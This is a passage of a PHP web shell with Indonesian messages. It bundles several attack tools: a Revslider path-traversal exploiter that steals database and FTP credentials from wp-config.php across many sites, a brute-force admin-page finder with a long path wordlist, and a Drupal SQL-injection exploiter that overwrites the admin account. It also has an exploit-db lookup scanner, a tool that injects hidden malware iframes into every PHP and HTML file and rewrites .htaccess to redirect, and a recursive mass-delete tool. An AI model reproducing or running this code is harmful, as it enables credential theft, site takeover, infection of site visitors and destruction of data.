  626. if($_GET['666'] == 'upload') {
  627.     echo "<center>";
  628.     if($_POST['upload']) {
  629.         if(@copy($_FILES['ix_file']['tmp_name'], "$dir/".$_FILES['ix_file']['name']."")) {
  630.             $act = "<font color=lime>Sukses, Cok!</font> at <i><b>$dir/".$_FILES['ix_file']['name']."</b></i>";
  631.         } else {
  632.             $act = "<font color=red>Gagal upload, Cok!</font>";
  633.         }
  634.     }
  635.     echo "Upload File: [ ".w($dir,"Writeable")." ]<form method='post' enctype='multipart/form-data'><input type='file' name='ix_file'><input type='submit' class='kotak' value='Upload' name='upload'></form>";
  636.     echo $act;
  637.     ;
  638.     echo "</center>";
  639. }
  640. elseif ($_GET['666'] == revslider) {
  641.     echo "
  642. <center class='mybox'>
  643. <h1>Revslider Mass Exploiter by mr.magnom | Recoded by Berandal</h1>
  644. <form method='post'>
  645. <textarea class='mybox' name='site' cols='50' rows='12'>
  646. http://site.com
  647. http://site2.com
  648. http://site3.com</textarea><br>
  649. <input class='kotak' type='submit' style='width: 50px; height: 30px; border-color:white;margin:10px 2px 0 2px;' name='sikat' value='SIKAT!'>
  650. </form></center>
  651. ";
  652. function findit($mytext,$starttag,$endtag) {
  653.  $posLeft  = stripos($mytext,$starttag)+strlen($starttag);
  654.  $posRight = stripos($mytext,$endtag,$posLeft+1);
  655.  return  substr($mytext,$posLeft,$posRight-$posLeft);
  656. }
  657. error_reporting(0);
  658. set_time_limit(0);
  659. $ya=$_POST['sikat'];
  660. $co=$_POST['site'];
  661.  
  662. if($ya){
  663.  $e=explode("\r\n",$co);
  664.  foreach($e as $bda){
  665.     //echo '<br>'.$bda;
  666.     $linkof='/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php';
  667.     $dn=($bda).($linkof);
  668.     $file=@file_get_contents($dn);
  669.     if(eregi('DB_HOST',$file) and !eregi('FTP_USER',$file) ){
  670.     echo'<center><font face="courier" color=white >----------------------------------------------</font></center>';
  671.     echo "<center><font face='courier' color='lime' >".$bda."</font></center>";
  672.     echo "<font face='courier' color=lime >DB name : </font>".findit($file,"DB_NAME', '","');")."<br>";
  673.     echo "<font face='courier' color=lime >DB user : </font>".findit($file,"DB_USER', '","');")."<br>";
  674.     echo "<font face='courier' color=lime >DB pass : </font>".findit($file,"DB_PASSWORD', '","');")."<br>";
  675.     echo "<font face='courier' color=lime >DB host : </font>".findit($file,"DB_HOST', '","');")."<br>";
  676.     }
  677.     elseif(eregi('DB_HOST',$file) and eregi('FTP_USER',$file)){
  678.     echo'<center><font face="courier" color=white >----------------------------------------------</font></center>';
  679.     echo "<center><font face='courier' color='lime' >".$bda."</font></center>";
  680.     echo "<font face='courier' color=lime >FTP user : </font>".findit($file,"FTP_USER','","');")."<br>";
  681.     echo "<font face='courier' color=lime >FTP pass : </font>".findit($file,"FTP_PASS','","');")."<br>";
  682.     echo "<font face='courier' color=lime >FTP host : </font>".findit($file,"FTP_HOST','","');")."<br>";
  683.     }
  684.     else{echo "<center><font face='courier' color='red' >".$bda." ----> not infected </font></center>";}
  685.     echo'<center><font face="courier" color=white >----------------------------------------------</font></center>';
  686. }
  687. }
  688. }
  689. elseif ($_GET['666'] == adfin) {
  690. echo "<form action='' method='post'>";
  691. set_time_limit(0);
  692. error_reporting(0);
  693. $list['front'] ="admin
  694. adm
  695. admincp
  696. admcp
  697. cp
  698. modcp
  699. moderatorcp
  700. adminare
  701. admins
  702. cpanel
  703. controlpanel";
  704. $list['end'] = "admin1.php
  705. adm/
  706. _adm_
  707. _admin_
  708. _administrator_
  709. operator
  710. sika
  711. adminweb
  712. develop
  713. ketua
  714. redaktur
  715. author
  716. user
  717. new
  718. newadmin
  719. new/index.php
  720. new/index.html
  721. newadmin/index.php
  722. newadmin/index.html
  723. new/login.php
  724. new/login.html
  725. admin/uploadimage.php
  726. admin/submit.php
  727. admin/uploadbg.php
  728. wp-admin
  729. index.php/admin
  730. index.php/login
  731. index.php/admin.php
  732. index.php/admin.html
  733. index.php/login.php
  734. index.php/login.html
  735. users
  736. dinkesadmin
  737. retel
  738. panel
  739. paneladmin
  740. panellogin
  741. redaksi
  742. cp-admin
  743. Login@web
  744. admin1
  745. admin2
  746. admin3
  747. admin4
  748. admin5
  749. admin6
  750. admin7
  751. admin8
  752. admin9
  753. admin10
  754. master
  755. master/index.php
  756. master/login.php
  757. terasadmin/index.php
  758. terasadmin/login.php
  759. rahasia
  760. rahasia/login.php
  761. rahasia/admin.php
  762. rahasia/index.php
  763. dinkesadmin/login.php
  764. adminpmb
  765. adminpmb/index.php
  766. adminpmb/login.php
  767. system
  768. system/index.php
  769. system/login.php
  770. system/admin.php
  771. webadmin
  772. webadmin/index.php
  773. webadmin/login.php
  774. wpanel
  775. wpanel/index.php
  776. wpanel/login.php
  777. adminpanel
  778. adminpanel/index.php
  779. adminpanel/login.php
  780. adminkec
  781. adminkec/index.php
  782. adminkec/login.php
  783. admindesa
  784. admindesa/index.php
  785. admindesa/login.php
  786. adminkota
  787. adminkota/index.php
  788. adminkota/login.php
  789. admin123
  790. admin123/index.php
  791. admin123/login.php
  792. logout
  793. logout/index.php
  794. logout/login.php
  795. logout/admin.php
  796. adminweb_setting
  797. admin1.html
  798. admin
  799. administrator
  800. admin1.html
  801. admin2.php
  802. admin2.html
  803. yonetim.php
  804. yonetim.html
  805. yonetici.php
  806. yonetici.html
  807. ccms/
  808. ccms/login.php
  809. ccms/index.php
  810. maintenance/
  811. webmaster/
  812. adm/
  813. configuration/
  814. configure/
  815. websvn/
  816. admin/
  817. admin/account.php
  818. admin/account.html
  819. admin/index.php
  820. admin/index.html
  821. admin/login.php
  822. admin/login.html
  823. admin/home.php
  824. admin/controlpanel.html
  825. admin/controlpanel.php
  826. admin.php
  827. admin.html
  828. admin/cp.php
  829. admin/cp.html
  830. cp.php
  831. cp.html
  832. administrator/
  833. administrator/index.html
  834. administrator/index.php
  835. administrator/login.html
  836. administrator/login.php
  837. administrator/account.html
  838. administrator/account.php
  839. administrator.php
  840. administrator.html
  841. login.php
  842. login.html
  843. modelsearch/login.php
  844. moderator.php
  845. moderator.html
  846. moderator/login.php
  847. moderator/login.html
  848. moderator/admin.php
  849. moderator/admin.html
  850. moderator/
  851. account.php
  852. account.html
  853. controlpanel/
  854. controlpanel.php
  855. controlpanel.html
  856. admincontrol.php
  857. admincontrol.html
  858. adminpanel.php
  859. adminpanel.html
  860. admin1.asp
  861. admin2.asp
  862. yonetim.asp
  863. yonetici.asp
  864. admin/account.asp
  865. admin/index.asp
  866. admin/login.asp
  867. admin/home.asp
  868. admin/controlpanel.asp
  869. admin.asp
  870. admin/cp.asp
  871. cp.asp
  872. administrator/index.asp
  873. administrator/login.asp
  874. administrator/account.asp
  875. administrator.asp
  876. login.asp
  877. modelsearch/login.asp
  878. moderator.asp
  879. moderator/login.asp
  880. moderator/admin.asp
  881. account.asp
  882. controlpanel.asp
  883. admincontrol.asp
  884. adminpanel.asp
  885. fileadmin/
  886. fileadmin.php
  887. fileadmin.asp
  888. fileadmin.html
  889. administration/
  890. administration.php
  891. administration.html
  892. sysadmin.php
  893. sysadmin.html
  894. phpmyadmin/
  895. myadmin/
  896. sysadmin.asp
  897. sysadmin/
  898. ur-admin.asp
  899. ur-admin.php
  900. ur-admin.html
  901. ur-admin/
  902. Server.php
  903. Server.html
  904. Server.asp
  905. Server/
  906. wp-admin/
  907. administr8.php
  908. administr8.html
  909. administr8/
  910. administr8.asp
  911. webadmin/
  912. webadmin.php
  913. webadmin.asp
  914. webadmin.html
  915. administratie/
  916. admins/
  917. admins.php
  918. admins.asp
  919. admins.html
  920. administrivia/
  921. Database_Administration/
  922. WebAdmin/
  923. useradmin/
  924. sysadmins/
  925. admin1/
  926. system-administration/
  927. administrators/
  928. pgadmin/
  929. directadmin/
  930. staradmin/
  931. ServerAdministrator/
  932. SysAdmin/
  933. administer/
  934. LiveUser_Admin/
  935. sys-admin/
  936. typo3/
  937. panel/
  938. cpanel/
  939. cPanel/
  940. cpanel_file/
  941. platz_login/
  942. rcLogin/
  943. blogindex/
  944. new/index.php
  945. new/index.html
  946. new/admin.php
  947. new/admin.html
  948. new/login.php
  949. new/login.html
  950. formslogin/
  951. autologin/
  952. support_login/
  953. meta_login/
  954. manuallogin/
  955. simpleLogin/
  956. loginflat/
  957. utility_login/
  958. showlogin/
  959. memlogin/
  960. members/
  961. login-redirect/
  962. sub-login/
  963. wp-login.php
  964. login1/
  965. dir-login/
  966. login_db/
  967. xlogin/
  968. smblogin/
  969. customer_login/
  970. UserLogin/
  971. login-us/
  972. acct_login/
  973. admin_area/
  974. bigadmin/
  975. project-admins/
  976. phppgadmin/
  977. pureadmin/
  978. sql-admin/
  979. radmind/
  980. openvpnadmin/
  981. wizmysqladmin/
  982. vadmind/
  983. ezsqliteadmin/
  984. hpwebjetadmin/
  985. newsadmin/
  986. adminpro/
  987. Lotus_Domino_Admin/
  988. bbadmin/
  989. vmailadmin/
  990. Indy_admin/
  991. ccp14admin/
  992. irc-macadmin/
  993. banneradmin/
  994. sshadmin/
  995. phpldapadmin/
  996. macadmin/
  997. administratoraccounts/
  998. admin4_account/
  999. admin4_colon/
  1000. radmind-1/
  1001. Super-Admin/
  1002. AdminTools/
  1003. cmsadmin/
  1004. SysAdmin2/
  1005. globes_admin/
  1006. cadmins/
  1007. phpSQLiteAdmin/
  1008. navSiteAdmin/
  1009. server_admin_small/
  1010. logo_sysadmin/
  1011. server/
  1012. database_administration/
  1013. power_user/
  1014. system_administration/
  1015. ss_vms_admin_sm/
  1016. adminarea/
  1017. bb-admin/
  1018. adminLogin/
  1019. panel-administracion/
  1020. instadmin/
  1021. memberadmin/
  1022. administratorlogin/
  1023. admin/admin.php
  1024. admin_area/admin.php
  1025. admin_area/login.php
  1026. siteadmin/login.php
  1027. siteadmin/index.php
  1028. siteadmin/login.html
  1029. admin/admin.html
  1030. admin_area/index.php
  1031. bb-admin/index.php
  1032. bb-admin/login.php
  1033. bb-admin/admin.php
  1034. admin_area/login.html
  1035. admin_area/index.html
  1036. admincp/index.asp
  1037. admincp/login.asp
  1038. admincp/index.html
  1039. webadmin/index.html
  1040. webadmin/admin.html
  1041. webadmin/login.html
  1042. admin/admin_login.html
  1043. admin_login.html
  1044. panel-administracion/login.html
  1045. nsw/admin/login.php
  1046. webadmin/login.php
  1047. admin/admin_login.php
  1048. admin_login.php
  1049. admin_area/admin.html
  1050. pages/admin/admin-login.php
  1051. admin/admin-login.php
  1052. admin-login.php
  1053. bb-admin/index.html
  1054. bb-admin/login.html
  1055. bb-admin/admin.html
  1056. admin/home.html
  1057. pages/admin/admin-login.html
  1058. admin/admin-login.html
  1059. admin-login.html
  1060. admin/adminLogin.html
  1061. adminLogin.html
  1062. home.html
  1063. rcjakar/admin/login.php
  1064. adminarea/index.html
  1065. adminarea/admin.html
  1066. webadmin/index.php
  1067. webadmin/admin.php
  1068. user.html
  1069. modelsearch/login.html
  1070. adminarea/login.html
  1071. panel-administracion/index.html
  1072. panel-administracion/admin.html
  1073. modelsearch/index.html
  1074. modelsearch/admin.html
  1075. admincontrol/login.html
  1076. adm/index.html
  1077. adm.html
  1078. user.php
  1079. panel-administracion/login.php
  1080. wp-login.php
  1081. adminLogin.php
  1082. admin/adminLogin.php
  1083. home.php
  1084. adminarea/index.php
  1085. adminarea/admin.php
  1086. adminarea/login.php
  1087. panel-administracion/index.php
  1088. panel-administracion/admin.php
  1089. modelsearch/index.php
  1090. modelsearch/admin.php
  1091. admincontrol/login.php
  1092. adm/admloginuser.php
  1093. admloginuser.php
  1094. admin2/login.php
  1095. admin2/index.php
  1096. adm/index.php
  1097. adm.php
  1098. affiliate.php
  1099. adm_auth.php
  1100. memberadmin.php
  1101. administratorlogin.php
  1102. admin/admin.asp
  1103. admin_area/admin.asp
  1104. admin_area/login.asp
  1105. admin_area/index.asp
  1106. bb-admin/index.asp
  1107. bb-admin/login.asp
  1108. bb-admin/admin.asp
  1109. pages/admin/admin-login.asp
  1110. admin/admin-login.asp
  1111. admin-login.asp
  1112. user.asp
  1113. webadmin/index.asp
  1114. webadmin/admin.asp
  1115. webadmin/login.asp
  1116. admin/admin_login.asp
  1117. admin_login.asp
  1118. panel-administracion/login.asp
  1119. adminLogin.asp
  1120. admin/adminLogin.asp
  1121. home.asp
  1122. adminarea/index.asp
  1123. adminarea/admin.asp
  1124. adminarea/login.asp
  1125. panel-administracion/index.asp
  1126. panel-administracion/admin.asp
  1127. modelsearch/index.asp
  1128. modelsearch/admin.asp
  1129. admincontrol/login.asp
  1130. adm/admloginuser.asp
  1131. admloginuser.asp
  1132. admin2/login.asp
  1133. admin2/index.asp
  1134. adm/index.asp
  1135. adm.asp
  1136. affiliate.asp
  1137. adm_auth.asp
  1138. memberadmin.asp
  1139. administratorlogin.asp
  1140. siteadmin/login.asp
  1141. siteadmin/index.asp
  1142. ADMIN/
  1143. paneldecontrol/
  1144. login/
  1145. cms/
  1146. admon/
  1147. ADMON/
  1148. administrador/
  1149. superadmin/
  1150. superadmin.php
  1151. ADMIN/login.php
  1152. panelc/
  1153. panel/admin.php
  1154. panel/index.php
  1155. ADMIN/login.html";
  1156. function template() {
  1157. echo '
  1158. <script type="text/javascript">
  1159. <!--
  1160. function insertcode($text, $place, $replace)
  1161. {
  1162.     var $this = $text;
  1163.     var logbox = document.getElementById($place);
  1164.     if($replace == 0)
  1165.         document.getElementById($place).innerHTML = logbox.innerHTML+$this;
  1166.     else
  1167.         document.getElementById($place).innerHTML = $this;
  1168. //document.getElementById("helpbox").innerHTML = $this;
  1169. }
  1170. -->
  1171. </script>
  1172. <div class="mybox" style="text-align:left">
  1173. <h1>Admin Page Finder</h1><hr color="white"><br>
  1174. <div class="wrapper">
  1175. <div class="tube">
  1176. <table class="tabnet"><tr><td>
  1177. <form action="" method="post" name="xploit_form">
  1178.     URL
  1179.     &nbsp&nbsp&nbsp&nbsp&nbsp&nbsp&nbsp<input type="text" name="xploit_url" value="'.$_POST['xploit_url'].'" style="border:0;border-bottom:1px solid #292929; width:500px;" /><br><br>
  1180.     404 string
  1181.     <input type="text" name="xploit_404string" value="'.$_POST['xploit_404string'].'" style="border:0;border-bottom:1px solid #292929; width:500px;" /><br><br>
  1182. <input class="kotak" type="submit" style="width: 80px; height: 30px; border-color:white;margin:10px 2px 0 2px;" name="xploit_submit" value=" Scan!" align="center" />
  1183. </form><br>
  1184. <br /></table><hr color="white">
  1185. </div> <!-- /tube -->
  1186. <br />
  1187. <div class="green">
  1188. <div class="tube" id="rightcol">
  1189. Admin Login List: <span id="verified">0</span> / <span id="total">0</span><br />
  1190. <h3 style="color:lime">Nemu!</h3>
  1191. </div> <!-- /tube -->
  1192. </div><!-- /green -->
  1193. <br clear="all" /><br />
  1194. <div class="blue">
  1195. <div class="tube" id="logbox">
  1196. <br />
  1197. <br />
  1198. Admin page Finder :<br /><br />
  1199. </div> <!-- /tube -->
  1200. </div> <!-- /blue -->
  1201. </div> <!-- /wrapper -->
  1202. <br clear="all"><br>';
  1203. }
  1204. function show($msg, $br=1, $stop=0, $place='logbox', $replace=0) {
  1205.     if($br == 1) $msg .= "<br />";
  1206.     echo "<script type=\"text/javascript\">insertcode('".$msg."', '".$place."', '".$replace."');</script>";
  1207.     if($stop == 1) exit;
  1208.     @flush();@ob_flush();
  1209. }
  1210. function check($x, $front=0) {
  1211.     global $_POST,$site,$false;
  1212.     if($front == 0) $t = $site.$x;
  1213.     else $t = 'http://'.$x.'.'.$site.'/';
  1214.     $headers = get_headers($t);
  1215.     if (!eregi('200', $headers[0])) return 0;
  1216.     $data = @file_get_contents($t);
  1217.     if($_POST['xploit_404string'] == "") if($data == $false) return 0;
  1218.     if($_POST['xploit_404string'] != "") if(strpos($data, $_POST['xploit_404string'])) return 0;
  1219.     return 1;
  1220. }
  1221.  
  1222. // --------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
  1223. template();
  1224. if(!isset($_POST['xploit_url'])) die;
  1225. if($_POST['xploit_url'] == '') die;
  1226. $site = $_POST['xploit_url'];
  1227. if ($site[strlen($site)-1] != "/") $site .= "/";
  1228. if($_POST['xploit_404string'] == "") $false = @file_get_contents($site."d65897f5380a21a42db94b3927b823d56ee1099a-this_can-t_exist.html");
  1229. $list['end'] = str_replace("\r", "", $list['end']);
  1230. $list['front'] = str_replace("\r", "", $list['front']);
  1231. $pathes = explode("\n", $list['end']);
  1232. $frontpathes = explode("\n", $list['front']);
  1233. show(count($pathes)+count($frontpathes), 1, 0, 'total', 1);
  1234. $verificate = 0;
  1235. foreach($pathes as $path) {
  1236.     show('Nge-Cek '.$site.$path.' : ', 0, 0, 'logbox', 0);
  1237.     $verificate++; show($verificate, 0, 0, 'verified', 1);
  1238.     if(check($path) == 0) show('Gak ada', 1, 0, 'logbox', 0);
  1239.     else{
  1240.         show('<span style="color: lime;"><strong>KETEMU!</strong></span>', 1, 0, 'logbox', 0);
  1241.         show('<a href="'.$site.$path.'">'.$site.$path.'</a>', 1, 0, 'rightcol', 0);
  1242.     }
  1243. }
  1244. preg_match("/\/\/(.*?)\//i", $site, $xx); $site = $xx[1];
  1245. if(substr($site, 0, 3) == "www") $site = substr($site, 4);
  1246. foreach($frontpathes as $frontpath) {
  1247.     show('Nge-Cek http://'.$frontpath.'.'.$site.'/ : ', 0, 0, 'logbox', 0);
  1248.     $verificate++; show($verificate, 0, 0, 'verified', 1);
  1249.     if(check($frontpath, 1) == 0) show('Gak ada', 1, 0, 'logbox', 0);
  1250.     else{
  1251.         show('<span style="color: lime;"><strong>KETEMU!</strong></span>', 1, 0, 'logbox', 0);
  1252.         show('<a href="http://'.$frontpath.'.'.$site.'/">'.$frontpath.'.'.$site.'</a>', 1, 0, 'rightcol', 0);
  1253.   }
  1254. }
  1255. }
  1256. elseif($_GET['666'] == drupal) {
  1257.     echo "<div class='mybox'>
  1258. <h1>Drupal Mass Exploiter</h1><hr color='white'><br>
  1259. <form method='post' action=''>
  1260. <textarea rows='10'class='mybox' cols='10' name='url'>
  1261. http://www.site.com
  1262. http://www.site2.com</textarea><br><br>
  1263. <input type='submit' class='kotak' style='border-color:white' name='submit' value='SIKAT!'>
  1264. </form>
  1265. </div>
  1266. ";
  1267. $drupal  = ($_GET["drupal"]);
  1268. if($drupal == 'drupal'){
  1269. $filename = $_FILES['file']['name'];
  1270. $filetmp  = $_FILES['file']['tmp_name'];
  1271. echo "<div class='mybox'><form method='POST' enctype='multipart/form-data'>
  1272.    <input type='file'name='file' />
  1273.    <input type='submit' value='drupal !' />
  1274. </form></div>";
  1275. move_uploaded_file($filetmp,$filename);
  1276. }
  1277.     error_reporting(0);
  1278.     if (isset($_POST['submit'])) {
  1279.         function exploit($url) {
  1280.             $post_data = "name[0;update users set name %3D 'berandal' , pass %3D '" . urlencode('$S$DrV4X74wt6bT3BhJa4X0.XO5bHXl/QBnFkdDkYSHj3cE1Z5clGwu') . "',status %3D'1' where uid %3D '1';#]=FcUk&name[]=Crap&pass=test&form_build_id=&form_id=user_login&op=Log+in";
  1281.             $params = array('http' => array('method' => 'POST', 'header' => "Content-Type: application/x-www-form-urlencoded
  1282. ", 'content' => $post_data));
  1283.             $ctx = stream_context_create($params);
  1284.             $data = file_get_contents($url . '/user/login/', null, $ctx);
  1285.             if ((stristr($data, 'mb_strlen() expects parameter 1 to be string') && $data) || (stristr($data, 'FcUk Crap') && $data)) {
  1286.                 $fp = fopen("exploited.txt", 'a+');
  1287.                 fwrite($fp, "Exploitied  User: berandal Pass: berandal  =====> {$url}/user/login");
  1288.                 fwrite($fp, "
  1289. ");
  1290.                 fwrite($fp, "--------------------------------------------------------------------------------------------------");
  1291.                 fwrite($fp, "
  1292. ");
  1293.                 fclose($fp);                      
  1294.                 echo "<font color='lime'><b>Success:<font color='white'>berandal</font> Pass:<font color='white'>berandal</font> =><a href='{$url}/user/login' target=_blank ><font color='green'> {$url}/user/login </font></a></font></b><br>";
  1295.             } else {
  1296.                 echo "<font color='red'><b>Failed => {$url}/user/login</font></b><br>";
  1297.             }
  1298.         }
  1299.         $urls = explode("
  1300. ", $_POST['url']);
  1301.         foreach ($urls as $url) {
  1302.             $url = @trim($url);
  1303.             echo exploit($url);
  1304.         }
  1305.     }
  1306. }
  1307. elseif($_GET['666'] == cmsvuln) {
  1308.     @set_time_limit(0);
  1309.     @error_reporting(0);
  1310. // Script Functions , start ..!
  1311. function ask_exploit_db($component){
  1312. $exploitdb ="http://www.exploit-db.com/search/?action=search&filter_page=1&filter_description=$component&filter_exploit_text=&filter_author=&filter_platform=0&filter_type=0&filter_lang_id=0&filter_port=&filter_osvdb=&filter_cve=";
  1313. $result = @file_get_contents($exploitdb);
  1314. if (eregi("No results",$result))  {
  1315. echo"<td>Gak ada</td><td><a href='http://www.google.com/search?hl=en&q=download+$component'>Download</a></td></tr>";
  1316. }else{
  1317. echo"<td><a href='$exploitdb'>Klik Ini..!</a></td><td><--</td></tr>";
  1318. }
  1319. }
  1320. /**************************************************************/
  1321. /* Joomla Conf */
  1322. function get_components($site){
  1323. $source = @file_get_contents($site);
  1324. preg_match_all('{option,(.*?)/}i',$source,$f);
  1325. preg_match_all('{option=(.*?)(&amp;|&|")}i',$source,$f2);
  1326. preg_match_all('{/components/(.*?)/}i',$source,$f3);
  1327. $arz=array_merge($f2[1],$f[1],$f3[1]);
  1328. $coms=array();
  1329. if(count($arz)==0){ echo "<tr><td style='border-color:white' colspan=3>[~] Gak ada ! Keknya Site Error atau Option salah :-</td></tr>";}
  1330. foreach(array_unique($arz) as $x){
  1331. $coms[]=$x;
  1332. }
  1333. foreach($coms as $comm){
  1334. echo "<tr><td>$comm</td>";
  1335. ask_exploit_db($comm);
  1336. }
  1337. }
  1338. /**************************************************************/
  1339. /* WP Conf */
  1340. function get_plugins($site){
  1341. $source = @file_get_contents($site);
  1342. preg_match_all("#/plugins/(.*?)/#i", $source, $f);
  1343. $plugins=array_unique($f[1]);
  1344. if(count($plugins)==0){ echo "<tr><td style='border-color:white' colspan=1>[~]  Gak ada ! Keknya Site Error atau Option salah :-</td></tr>";}
  1345. foreach($plugins as $plugin){
  1346. echo "<tr><td>$plugin</td>";
  1347. ask_exploit_db($plugin);
  1348. }
  1349. }
  1350. /**************************************************************/
  1351. /* Nuke's Conf */
  1352. function get_numod($site){
  1353. $source = @file_get_contents($site);
  1354. preg_match_all('{?name=(.*?)/}i',$source,$f);
  1355. preg_match_all('{?name=(.*?)(&amp;|&|l_op=")}i',$source,$f2);
  1356. preg_match_all('{/modules/(.*?)/}i',$source,$f3);
  1357. $arz=array_merge($f2[1],$f[1],$f3[1]);
  1358. $coms=array();
  1359. if(count($arz)==0){ echo "<tr><td style='border-color:white' colspan=3>[~]  Gak ada ! Keknya Site Error atau Option salah :-</td></tr>";}
  1360. foreach(array_unique($arz) as $x){
  1361. $coms[]=$x;
  1362. }
  1363. foreach($coms as $nmod){
  1364. echo "<tr><td>$nmod</td>";
  1365. ask_exploit_db($nmod);
  1366. }
  1367. }
  1368. /*****************************************************/
  1369. /* Xoops Conf */
  1370. function get_xoomod($site){
  1371. $source = @file_get_contents($site);
  1372. preg_match_all('{/modules/(.*?)/}i',$source,$f);
  1373. $arz=array_merge($f[1]);
  1374. $coms=array();
  1375. if(count($arz)==0){ echo "<tr><td style='border-color:white' colspan=3>[~]  Gak ada ! Keknya Site Error atau Option salah :-</td></tr>";}
  1376. foreach(array_unique($arz) as $x){
  1377. $coms[]=$x;
  1378. }
  1379. foreach($coms as $xmod){
  1380. echo "<tr><td>$xmod</td>";
  1381. ask_exploit_db($xmod);
  1382. }
  1383. }
  1384. /**************************************************************/
  1385.  /* Header */
  1386. function t_header($site){
  1387. echo'<br><hr color="white"><br><table align="center" border="1" style="border-color=white; text-align:left;" width="50%" cellspacing="1" cellpadding="5">';
  1388. echo'
  1389. <tr>
  1390. <td style="border-color=white">Site : <a href="'.$site.'">'.$site.'</a></td>
  1391. <td style="border-color=white">Exploit-db</b></td>
  1392. <td style="border-color=white">Exploit it !</td>
  1393. </tr>
  1394. ';
  1395. }
  1396. echo '<div class="mybox" style="text-align:left">
  1397. <h1>CMS Vulnerability Scanner</h1><hr color="white">
  1398. <form method="POST" action=""  class="header-izz">
  1399.     <p>Link&nbsp&nbsp<input type="text" style="border:0;border-bottom:1px solid #292929; width:500px;" name="site" value="http://127.0.0.1/" >
  1400.     <br><br>
  1401.     CMS
  1402.     &nbsp&nbsp&nbsp<select  name="pilihan" style="border:0;border-bottom:1px solid #292929; width:500px;">
  1403.     <option>Wordpress</option>
  1404.     <option>Joomla</option>
  1405.     <option>Nukes</option>
  1406.     <option>Xoops</option>
  1407.     </select><br><br>&nbsp&nbsp&nbsp&nbsp&nbsp&nbsp&nbsp<input type="submit" style="width: 50px; height: 30px; border-color=white;margin:10px 2px 0 2px;" value="Sikat" class="kotak"></p>
  1408. </form>';
  1409. // Start Scan :P :P ...
  1410. if($_POST){
  1411. $site=strip_tags(trim($_POST['site']));
  1412. t_header($site);
  1413. echo $x01 = ($_POST['pilihan']=="Wordpress") ? get_plugins($site):"";
  1414. echo $x02 = ($_POST['pilihan']=="Joomla") ? get_components($site):"";
  1415. echo $x03 = ($_POST['pilihan']=="Nuke's") ? get_numod($site):"";
  1416. echo $x04 = ($_POST['pilihan']=="Xoops") ? get_xoomod($site):"";
  1417. }
  1418. exit;
  1419. }
  1420. elseif($_GET['666'] == 'mal')
  1421.     {
  1422. @ini_set('output_buffering', 0); {
  1423. ?>
  1424.     <form action="" method="post">
  1425. <br><center><font size=4>=[ Malware Tools ]=</font><br><br>
  1426. <font color="red">Private Network / Dial Up Modem ,PC Private , ato Home PC / NETWORK</font>&nbsp;(Ojo digawe goblok!!)<br><br>
  1427.     <input class='kotak' type='submit' name='redirect' value="Redirect Search Engine To Malware Site" /></td><td>
  1428.     <input type='submit' class='kotak' name='infect' value="Infect User" /></td><tr></table>
  1429.         <input type='submit' name='code' class='kotak' value="Code Insert" /></td><tr></table>
  1430. </center><br>
  1431.  
  1432. <?php
  1433.         if (isset($_POST['redirect'])) if ($myfile = fopen(".htaccess", 'a')) {
  1434.             fwrite($myfile, gzuncompress(base64_decode($mal)));
  1435.             fwrite($myfile, "
  1436.  
  1437. ");
  1438.             fclose($myfile);
  1439.             ob_end_flush();
  1440.         } else echo "<script>alert('Malware Ga ke kirim Jancookk'); hideAll();</script>";
  1441.     }   if (isset($_POST['infect'])) {
  1442.         $coun = 0;
  1443.         $str = "<iframe width=0px height=0px frameborder=no name=frame1 src=" . $malsite . "> </iframe>";
  1444.         foreach (glob($_GET['dir'] . $directorysperator . "*.php") as $injectj00) {
  1445.             if ($myfile = fopen($injectj00, 'a')) {
  1446.                 fputs($myfile, $str);
  1447.                 fclose($myfile);
  1448.             } else $coun = 1;
  1449.         }
  1450.         foreach (glob($_GET['dir'] . $directorysperator . "*.htm") as $injectj00) {
  1451.             if ($myfile = fopen($injectj00, 'a')) {
  1452.                 fputs($myfile, $str);
  1453.                 fclose($myfile);
  1454.             } else $coun = 1;
  1455.         }
  1456.         foreach (glob($_GET['dir'] . $directorysperator . "*.html") as $injectj00) {
  1457.             if ($myfile = fopen($injectj00, 'a')) {
  1458.                 fputs($myfile, $str);
  1459.                 fclose($myfile);
  1460.             } else $coun = 1;
  1461.         }
  1462.         if ($coun == 0) echo "<script>alert('Malware Infect In user ... DONE...!!!!'); hideAll();</script>";
  1463.         else echo "<script>alert('Malware Ga ke kirim Jancookk'); hideAll();</script>";
  1464.     }
  1465.     if (!isset($_POST['code'])) {
  1466.         if ($file1 = fopen(".htaccess", 'r')) {
  1467.         } else echo "<script>alert('Malware Ga ke kirim Jancookk'); hideAll();</script>";
  1468.     } else {
  1469.         if ($myfile = fopen(".htaccess", 'a')) {
  1470.             fwrite($myfile, $_POST['code']);
  1471.             fwrite($myfile, "
  1472.  
  1473. ");
  1474.             fclose($myfile);
  1475.             ob_end_flush();
  1476.         } else echo "Permission Denied";
  1477.     }
  1478.  
  1479. }
  1480. elseif($_GET['666'] == 'mass_delete') {
  1481.     function hapus_massal($dir,$namafile) {
  1482.         if(is_writable($dir)) {
  1483.             $dira = scandir($dir);
  1484.             foreach($dira as $dirb) {
  1485.                 $dirc = "$dir/$dirb";
  1486.                 $lokasi = $dirc.'/'.$namafile;
  1487.                 if($dirb === '.') {
  1488.                     if(file_exists("$dir/$namafile")) {
  1489.                         unlink("$dir/$namafile");
  1490.                     }
  1491.                 } elseif($dirb === '..') {
  1492.                     if(file_exists("".dirname($dir)."/$namafile")) {
  1493.                         unlink("".dirname($dir)."/$namafile");
  1494.                     }
  1495.                 } else {
  1496.                     if(is_dir($dirc)) {
  1497.                         if(is_writable($dirc)) {
  1498.                             if(file_exists($lokasi)) {
  1499.                                 echo "[<font color=red>DELETED</font>] $lokasi<br>";
  1500.                                 unlink($lokasi);
  1501.                                 $berandal = hapus_massal($dirc,$namafile);
  1502.                             }
  1503.                         }
  1504.                     }
  1505.                 }
  1506.             }
  1507.         }
  1508.     }
  1509.     if($_POST['start']) {
  1510.         echo "<div style='margin: 5px auto; padding: 5px'>";
  1511.         hapus_massal($_POST['d_dir'], $_POST['d_file']);
  1512.         echo "</div>";
  1513.     } else {
  1514.     echo "<center class='mybox'>";
  1515.     echo "<h1>Mass Delete</h1><form method='post'>
  1516.     <font style='text-decoration: underline;'>Folder:</font><br>
  1517.     <input type='text' name='d_dir' value='$dir' style='width: 450px; color:white;' height='10'><br><br>
  1518.     <font style='text-decoration: underline;'>Filename:</font><br>
  1519.     <input type='text' name='d_file' value='index.php' style='width: 450px; color:white;' height='10'><br><br>
  1520.     <input type='submit' name='start' value='Mass Delete' style='width: 450px;'>
  1521.     </form></center>";
  1522.     }
  1523. }
